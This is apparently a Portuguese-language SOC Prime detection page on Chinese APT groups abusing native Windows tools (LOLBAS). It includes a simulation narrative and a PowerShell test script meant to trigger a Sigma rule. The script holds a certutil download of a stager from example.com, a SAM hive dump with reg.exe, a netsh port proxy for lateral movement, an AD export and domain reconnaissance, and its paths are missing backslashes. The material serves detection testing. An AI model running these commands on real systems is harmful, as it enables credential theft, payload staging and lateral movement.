SOC Prime Bias: Crítico

18 May 2026 18:20 UTC

Caça a APTs Chineses Abusando de Ferramentas Nativas do Windows

Author Photo
SOC Prime Team linkedin icon Seguir
Caça a APTs Chineses Abusando de Ferramentas Nativas do Windows
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

O artigo explora como grupos de ameaças persistentes avançadas chinesas abusam de utilitários embutidos do Windows, frequentemente referidos como LOLBAS, para realizar reconhecimento, roubar credenciais e mover-se lateralmente através de ambientes enquanto se misturam à rotina de atividades administrativas.

Investigação

Destaca o uso específico da linha de comando de ferramentas nativas como nltest, certutil, netsh, reg.exe, vssadmin, entre outras, e aponta para regras Sigma que podem ajudar a detectar essas técnicas dentro de plataformas SIEM.

Mitigação

Os defensores são incentivados a monitorar a execução suspeita de binários nativos do Windows, aplicar controles de acesso de privilégio mínimo, auditar modificações no registro e implantar lógica de detecção baseada nos padrões Sigma referidos.

Resposta

Quando uma atividade suspeita de LOLBAS é identificada, as equipes de segurança devem disparar um alerta, isolar o host afetado, coletar logs relevantes, confirmar se houve despejo de credenciais ou movimento lateral, e realizar uma análise forense em quaisquer artefatos resultantes.

Fluxo de Ataque

Ainda estamos atualizando esta parte. Inscreva-se para ser notificado

Notifique-me

Execução de Simulação

Pré-requisito: O Check Pré‑Voo de Telemetria & Baseline deve ter sido aprovado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e narrativa DEVEM refletir diretamente os TTPs identificados e têm como objetivo gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa & Comandos de Ataque:

    Um invasor que obteve acesso inicial em uma workstation Windows conectada ao domínio busca mapear o domínio, enumerar grupos privilegiados e coletar material de credenciais usando apenas binários nativos para evitar disparar assinaturas de AV tradicionais. Os passos são:

    1. Enumerar Controladores de Domínio: nltest /dclist:domain.local – revela todos os DCs no domínio alvo.
    2. Coletar Informações do Sistema: systeminfo – coleta versão do OS, patches e detalhes de hardware.
    3. Listar Processos em Execução: tasklist – fornece insight em serviços privilegiados.
    4. Consultar Logs de Eventos do Windows para Eventos de Logon: Get-EventLog -LogName Security -InstanceId 4624 (PowerShell) – extrai eventos de logon bem-sucedidos.
    5. Baixar um payload em estágio: certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe – usa certutil para ignorar filtros da web.
    6. Enumerar Administradores Locais: net localgroup administrators – identifica contas privilegiadas.
    7. Exportar Hive do Registro SAM: reg.exe save hklmsam C:sam.save – tenta despejar hashes de senha.
    8. Criar Proxy de Porta para Movimento Lateral: netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389 – prepara um túnel.
    9. Enumerar Registros DNS: dnscmd . /enumrecords /zone – descobre zonas DNS internas.
    10. Exportar objetos AD via LDIFDE: ldifde.exe -f C:WindowsTempad_dump.txt -p subtree – extrai dados do diretório.
    11. Criar uma Cópia de Sombra do Volume: vssadmin create shadow /for=C: – permite acesso ao nível de arquivo a arquivos bloqueados.

    Cada comando corresponde exatamente a uma das strings “CommandLine|contains” na regra Sigma, garantindo que a regra dispare nos eventos de criação de processo resultantes.

  • Script de Teste de Regressão: (PowerShell – auto-contido, requer privilégios de administrador)

    # TC-20260518-A7B9K – Simular uso adversário de utilitários nativos do Windows
    # NOTA: Execute em um host Windows conectado ao domínio com privilégios de admin.
    
    # 1. Enumeração de controladores de domínio
    nltest /dclist:domain.local
    
    # 2. Informações do sistema
    systeminfo
    
    # 3. Listar processos
    tasklist
    
    # 4. Extração de logs de evento de segurança (PowerShell)
    Get-EventLog -LogName security -InstanceId 4624
    
    # 5. Baixar payload em estágio via certutil
    certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe
    
    # 6. Enumerar administradores locais
    net localgroup administrators
    
    # 7. Exportar hive SAM
    reg.exe save hklmsam C:sam.save
    
    # 8. Configurar proxy de porta
    netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389
    
    # 9. Enumeração de zona DNS
    dnscmd . /enumrecords /zone
    
    # 10. Exportar dados AD via LDIFDE
    ldifde.exe -f C:WindowsTempad_dump.txt -p subtree
    
    # 11. Criar uma cópia de sombra de volume
    vssadmin create shadow /for=C:
  • Comandos de Limpeza:

    # Remover arquivos criados durante a simulação
    Remove-Item -Path C:WindowsTempstager.exe -ErrorAction SilentlyContinue
    Remove-Item -Path C:sam.save -ErrorAction SilentlyContinue
    Remove-Item -Path C:WindowsTempad_dump.txt -ErrorAction SilentlyContinue
    
    # Excluir a regra de portproxy
    netsh interface portproxy delete v4tov4 listenport=4444
    
    # Excluir a cópia de sombra (opcional – requer ID da cópia de sombra)
    # vssadmin delete shadows /for=C: /all /quiet